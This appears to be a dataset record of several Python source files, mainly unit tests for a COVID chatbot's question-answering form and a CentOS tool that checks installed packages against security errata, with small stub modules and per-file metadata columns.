QuestionAnsweringStatus.OUT_OF_DISTRIBUTION), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.OUT_OF_DISTRIBUTION, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) def test_provide_feedback_affirm(self): tracker = self.create_tracker( slots={ REQUESTED_SLOT: FEEDBACK_SLOT, QUESTION_SLOT: QUESTION, ANSWERS_SLOT: ANSWERS, STATUS_SLOT: QuestionAnsweringStatus.SUCCESS, }, intent="affirm", ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(FEEDBACK_SLOT, True), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet(ASKED_QUESTION_SLOT, FULL_RESULT_SUCCESS), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) def test_provide_feedback_deny(self): tracker = self.create_tracker( slots={ REQUESTED_SLOT: FEEDBACK_SLOT, QUESTION_SLOT: QUESTION, ANSWERS_SLOT: ANSWERS, STATUS_SLOT: QuestionAnsweringStatus.SUCCESS, }, intent="deny", ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(FEEDBACK_SLOT, False), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, {**FULL_RESULT_SUCCESS, FEEDBACK_KEY: False} ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates(["utter_post_feedback"]) def test_provide_feedback_not_given(self): tracker = self.create_tracker( slots={ REQUESTED_SLOT: FEEDBACK_SLOT, QUESTION_SLOT: QUESTION, ANSWERS_SLOT: ANSWERS, STATUS_SLOT: QuestionAnsweringStatus.SUCCESS, }, text="some text with", intent="another_intent", entities=[{"and": "entities"}], ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(FEEDBACK_SLOT, FEEDBACK_NOT_GIVEN), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, {**FULL_RESULT_SUCCESS, FEEDBACK_KEY: FEEDBACK_NOT_GIVEN}, ), Form(None), SlotSet(REQUESTED_SLOT, None), ActionExecuted("utter_ask_another_question"), ActionExecuted("action_listen"), UserUttered( "some text with", parse_data={ "text": "some text with", "intent": {"name": "another_intent"}, "intent_ranking": [], "entities": [{"and": "entities"}], }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_success(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=SUCCESS_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.SUCCESS), SlotSet(ANSWERS_SLOT, ANSWERS), SlotSet(REQUESTED_SLOT, FEEDBACK_SLOT), ] ) self.assert_templates([None, "utter_ask_feedback"]) self.assert_texts([ANSWERS[0], None]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_failure(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=FAILURE_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.FAILURE), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.FAILURE, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_out_of_distribution(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=OUT_OF_DISTRIBUTION_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.OUT_OF_DISTRIBUTION), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.OUT_OF_DISTRIBUTION, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_need_assessment(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=NEED_ASSESSMENT_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.NEED_ASSESSMENT), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.NEED_ASSESSMENT, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([])
32.116667
88
0.572782
1,349
15,416
6.203113
0.092661
0.055927
0.037643
0.043021
0.806883
0.788838
0.780354
0.77892
0.76924
0.763145
0
0.000198
0.34568
15,416
479
89
32.183716
0.829384
0
0
0.565657
0
0
0.077193
0.045537
0
0
0
0
0.080808
1
0.042929
false
0
0.015152
0
0.065657
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8ea831799aea2aeef5fc8f77fd4d7ab78df0e408
46
py
Python
mflops/__init__.py
shuncyu/mflops
81fddf9407bcbdca02b9c57f6b03640b3fb94101
[ "MIT" ]
1
2020-12-17T03:09:20.000Z
2020-12-17T03:09:20.000Z
mflops/__init__.py
shuncyu/mflops
81fddf9407bcbdca02b9c57f6b03640b3fb94101
[ "MIT" ]
null
null
null
mflops/__init__.py
shuncyu/mflops
81fddf9407bcbdca02b9c57f6b03640b3fb94101
[ "MIT" ]
null
null
null
from .model_info import get_model_compute_info
46
46
0.913043
8
46
4.75
0.75
0
0
0
0
0
0
0
0
0
0
0
0.065217
46
1
46
46
0.883721
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8ed785f9ecac41cc4671b1c00a6044aaca380a37
31
py
Python
aiotuyalan/lib/__init__.py
zachcheatham/aiotuyalan
cc07703509ae4b618995668d59e0624904c9a75f
[ "MIT" ]
null
null
null
aiotuyalan/lib/__init__.py
zachcheatham/aiotuyalan
cc07703509ae4b618995668d59e0624904c9a75f
[ "MIT" ]
null
null
null
aiotuyalan/lib/__init__.py
zachcheatham/aiotuyalan
cc07703509ae4b618995668d59e0624904c9a75f
[ "MIT" ]
null
null
null
from .client import TuyaClient
15.5
30
0.83871
4
31
6.5
1
0
0
0
0
0
0
0
0
0
0
0
0.129032
31
1
31
31
0.962963
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8ef2f5a9f4f1a846fe1bc7ce7c66cfad8a5a8285
23
py
Python
vogue/commands/load/__init__.py
mayabrandi/vogue
463e6417a9168eadb0d11dea2d0f97919494bcd3
[ "MIT" ]
111
2015-01-15T11:53:20.000Z
2022-03-26T19:55:24.000Z
vogue/commands/load/__init__.py
mayabrandi/vogue
463e6417a9168eadb0d11dea2d0f97919494bcd3
[ "MIT" ]
2,995
2015-01-15T16:14:20.000Z
2022-03-31T13:36:32.000Z
vogue/commands/load/__init__.py
mayabrandi/vogue
463e6417a9168eadb0d11dea2d0f97919494bcd3
[ "MIT" ]
55
2015-05-31T19:09:49.000Z
2021-11-01T10:50:31.000Z
from .base import load
11.5
22
0.782609
4
23
4.5
1
0
0
0
0
0
0
0
0
0
0
0
0.173913
23
1
23
23
0.947368
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d932b4c968ef33aec273d7a41dbca435dc81e22a
14,460
py
Python
tests/test_package_checker.py
jsoref/centos-package-cron
0c7e3e24b91619916a515c8ef492dcfa863dae66
[ "BSD-2-Clause" ]
83
2015-03-19T09:07:57.000Z
2021-10-14T02:19:58.000Z
tests/test_package_checker.py
jsoref/centos-package-cron
0c7e3e24b91619916a515c8ef492dcfa863dae66
[ "BSD-2-Clause" ]
26
2015-01-08T17:29:10.000Z
2020-03-04T19:56:19.000Z
tests/test_package_checker.py
jsoref/centos-package-cron
0c7e3e24b91619916a515c8ef492dcfa863dae66
[ "BSD-2-Clause" ]
21
2016-05-17T19:22:56.000Z
2021-02-15T14:27:08.000Z
#!/usr/bin/python import unittest import sys from centos_package_cron import package_checker from centos_package_cron import package_fetcher from centos_package_cron import errata_fetcher from centos_package_cron.errata_fetcher import ErrataType from centos_package_cron.errata_fetcher import ErrataSeverity from mock import Mock from centos_package_cron.package import Package class PackageCheckerTest(unittest.TestCase): def testAdvisoryPackageMeantForCurrentOsCentOs5(self): # arrange os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='5') errata = Mock() pkg = Mock() checker = package_checker.PackageChecker(errata,pkg,os_fetcher) advisory_packages = [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el4.2', 'arch':'x86_64'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el5.2', 'arch':'x86_64'}] # act result = map(lambda a: checker._advisoryPackageMeantForCurrentOs(a), advisory_packages) # assert assert result == [False, True] def testAdvisoryPackageMeantForCurrentOsCentOs_AllVersions(self): # arrange os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='6') errata = Mock() pkg = Mock() checker = package_checker.PackageChecker(errata,pkg,os_fetcher) advisory_packages = [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el4.2', 'arch':'x86_64'}, {'name': 'kernel', 'version':'2.6.32', 'release':'642.13.1.el6', 'arch':'i686'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el6.2', 'arch':'x86_64'}] # act result = map(lambda a: checker._advisoryPackageMeantForCurrentOs(a), advisory_packages) # assert assert result == [False, True, True] def testAdvisoryPackageMeantForCurrentOsCentOs7(self): # arrange os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') errata = Mock() pkg = Mock() checker = package_checker.PackageChecker(errata,pkg,os_fetcher) advisory_packages = [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el6.2', 'arch':'x86_64'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el7_0.2', 'arch':'x86_64'}] # act result = map(lambda a: checker._advisoryPackageMeantForCurrentOs(a), advisory_packages) # assert assert result == [False, True, True] def testSameVersionOfAnotherPackageInstalled(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['i686','x86_64'], ['7'], [{'name': 'libcacard-tools','version':'1.5.3', 'release':'60.el7_0.5', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('libgcrypt', '1.5.3', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert result == [] def testFindAdvisoriesOnInstalledPackagesNotInstalled(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el5_8.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('bash','1.0', '4.el7', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledButCurrentAlready(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '135.el7.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledButNewerVersion(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.4', '135.el5_8.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesVersionComparisonWith2Digits(self): # arrange errata = Mock() errata_packages = [ {'arch': 'x86_64', 'name': 'glibc', 'release': '55.el7.1', 'version': '2.17'}, {'arch': 'x86_64', 'name': 'glibc', 'release': '118.el7.3', 'version': '2.5'}] errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], errata_packages,[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('glibc','2.17', '55.el7.1', 'x86_64', 'updates'), ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert result == [] def testFindAdvisoriesOnInstalledPackagesBothOldAndNewInstalled(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '132.el7.2', 'x86_64', 'updates'), Package('xen-libs','3.0.4', '135.el7.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert result == [] def testFindAdvisoriesOnInstalledPackagesInstalledButLowerVersion(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.2', '135.el7.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertNotEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledButNewerRelease(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '135.el7.3', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledAndNeedsUpdatingButWrongCentOsVersion(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '135.el7.1', 'x86_64', 'updates'), Package('openssl','2.0', '4.el6', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='6') os_fetcher.get_mid_level_version = Mock(return_value='6.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledAndNeedsUpdatingButWrongCentOsVersionOnPackage(self): # https://github.com/wied03/centos-package-cron/issues/5 # arrange errata = Mock() adv_packages = [{'name': 'bash','version':'3.2', 'release':'33.el5.1', 'arch':'i386'}, {'name': 'bash','version':'3.2', 'release':'33.el5.1', 'arch':'src'}, {'name': 'bash','version':'3.2', 'release':'33.el5.1', 'arch':'x86_64'}, {'name': 'bash','version':'4.1.2', 'release':'15.el6_5.1', 'arch':'i686'}, {'name': 'bash','version':'4.1.2', 'release':'15.el6_5.1', 'arch':'src'}, {'name': 'bash','version':'4.1.2', 'release':'15.el6_5.1', 'arch':'x86_64'}, {'name': 'bash','version':'4.2.45', 'release':'5.el7_0.2', 'arch':'src'}, {'name': 'bash','version':'4.2.45', 'release':'5.el7_0.2', 'arch':'x86_64'}] errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['5', '6', '7'], adv_packages,[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('bash','4.1.2', '29.el6', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='6') os_fetcher.get_mid_level_version = Mock(return_value='6.6') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledAndNeedsUpdating(self): # arrange errata = Mock() advisory = errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) errata.get_errata = Mock(return_value=[advisory]) pkg = Mock() xen_package = Package('xen-libs','3.0.3', '135.el7.1', 'x86_64', 'updates') pkg.fetch_installed_packages = Mock(return_value=[ xen_package, Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert len(result) == 1 first = result[0] assert first['advisory'] == advisory assert first['installed_packages'] == [xen_package] if __name__ == "__main__": unittest.main()
44.085366
216
0.615214
1,618
14,460
5.289864
0.074784
0.055731
0.082369
0.06426
0.827433
0.819021
0.801612
0.785138
0.781984
0.781984
0
0.054264
0.223859
14,460
327
217
44.220183
0.708367
0.023306
0
0.689076
0
0
0.152994
0
0
0
0
0
0.067227
1
0.058824
false
0
0.084034
0
0.147059
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
d96f5c5299748f4e8e43da2e826f19d01f03be8b
34
py
Python
pettingzoo/classic/rps_v1.py
vstark21/PettingZoo
0ebd8fb540e195f9dd91d996f190e9a89dedcf26
[ "Apache-2.0" ]
4
2021-12-17T08:00:28.000Z
2022-02-12T12:25:24.000Z
pettingzoo/classic/rps_v1.py
vstark21/PettingZoo
0ebd8fb540e195f9dd91d996f190e9a89dedcf26
[ "Apache-2.0" ]
null
null
null
pettingzoo/classic/rps_v1.py
vstark21/PettingZoo
0ebd8fb540e195f9dd91d996f190e9a89dedcf26
[ "Apache-2.0" ]
1
2021-01-25T22:57:41.000Z
2021-01-25T22:57:41.000Z
from .rps.rps import env, raw_env
17
33
0.764706
7
34
3.571429
0.714286
0
0
0
0
0
0
0
0
0
0
0
0.147059
34
1
34
34
0.862069
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
795af4d864995ffc8fae39868fb4eb2dfaeab3d0
332
py
Python
colcon_export_command/xml/models/__init__.py
maciejmatuszak/colcon-export-command
a7747996cbff25d8611306a9c1987cea3966271e
[ "Apache-2.0" ]
null
null
null
colcon_export_command/xml/models/__init__.py
maciejmatuszak/colcon-export-command
a7747996cbff25d8611306a9c1987cea3966271e
[ "Apache-2.0" ]
null
null
null
colcon_export_command/xml/models/__init__.py
maciejmatuszak/colcon-export-command
a7747996cbff25d8611306a9c1987cea3966271e
[ "Apache-2.0" ]
null
null
null
from colcon_export_command.xml.models.project import ( AdditionalGenerationEnvironment, Component, Configuration, Configurations, Env, Envs, Project, ) __all__ = [ "AdditionalGenerationEnvironment", "Component", "Configuration", "Configurations", "Env", "Envs", "Project", ]
16.6
54
0.650602
23
332
9.130435
0.652174
0.380952
0.504762
0.638095
0.771429
0.771429
0.771429
0
0
0
0
0
0.240964
332
19
55
17.473684
0.833333
0
0
0
0
0
0.243976
0.093373
0
0
0
0
0
1
0
false
0
0.055556
0
0.055556
0
1
0
0
null
1
1
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
797ba3ce5ce939dc298e57e18fc7ff032d596f0b
70
py
Python
double3/double3sdk/depth/depth.py
CLOMING/winter2021_double
9b920baaeb3736a785a6505310b972c49b5b21e9
[ "Apache-2.0" ]
null
null
null
double3/double3sdk/depth/depth.py
CLOMING/winter2021_double
9b920baaeb3736a785a6505310b972c49b5b21e9
[ "Apache-2.0" ]
null
null
null
double3/double3sdk/depth/depth.py
CLOMING/winter2021_double
9b920baaeb3736a785a6505310b972c49b5b21e9
[ "Apache-2.0" ]
null
null
null
from double3sdk.double_api import _DoubleAPI class _Depth: pass
11.666667
44
0.785714
9
70
5.777778
1
0
0
0
0
0
0
0
0
0
0
0.017544
0.185714
70
5
45
14
0.894737
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6